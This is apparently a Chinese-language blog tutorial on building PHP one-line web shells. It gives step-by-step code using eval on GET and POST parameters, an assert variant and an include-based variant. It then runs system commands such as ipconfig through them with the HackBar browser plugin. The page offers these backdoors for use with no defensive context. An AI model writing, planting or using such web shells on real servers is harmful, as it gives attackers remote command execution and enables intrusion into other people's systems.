第一步:先创建一个get.php文档
第二步:用notepad++打开,编辑,输入代码
header('Content-Type:text/html;charset=gbk'); 因为浏览器不同,有可能出现乱码,输入这个命
令,可以避免这个问题
<?php @eval($_GET['cmd']);?>
第三步:用浏览器打开,就可以查看我们的信息
post步骤和get基本相同
第一步:新建一个post文档
第二步:用notepad++打开,编辑,输入代码
header('Content-Type:text/html;charset=gbk');
<?php @eval($_POST[‘cmd’]);?>
第三步:用浏览器打开,点击F12,找到HackBar,(注意这个HackBar是一个浏览器的插件,
需要我们使用火狐浏览器,在扩张里面搜这个插件,点击安装即可)
这里是安装好的样子
输入代码
点击下方Past data,输入cmd=system(‘ipconfig’);
最后点击execute即可
第一步:创建assert文档
第二步:用notepad++打开,编辑,输入代码
<?php @assert($_POST[‘cmd’])
第三步:打开浏览器,点击F12,输入
Cmd=system(‘ipconfig’);
第一步:创建一个新的2.php文档
第二步:在新建的2.php中输入
<?php phpinfo();?>
第三步:在我们一开始的get代码中,加上一条include “2.php”;
第三步:用浏览器打开即可
第一步:因为我们已经创建过新的文档(2.php),在post.php的基础上,输入
<?php include “2.php”;
@eval ($_POST[‘cmd’];)
?>
第二步:和get相同用浏览器打开,点击F12,找到HackBar,输入代码
点击下方Past data,输入cmd=system(‘ipconfig’);
网站声明:如果转载,请联系本站管理员。否则一切后果自行承担。
加入交流群
请使用微信扫一扫!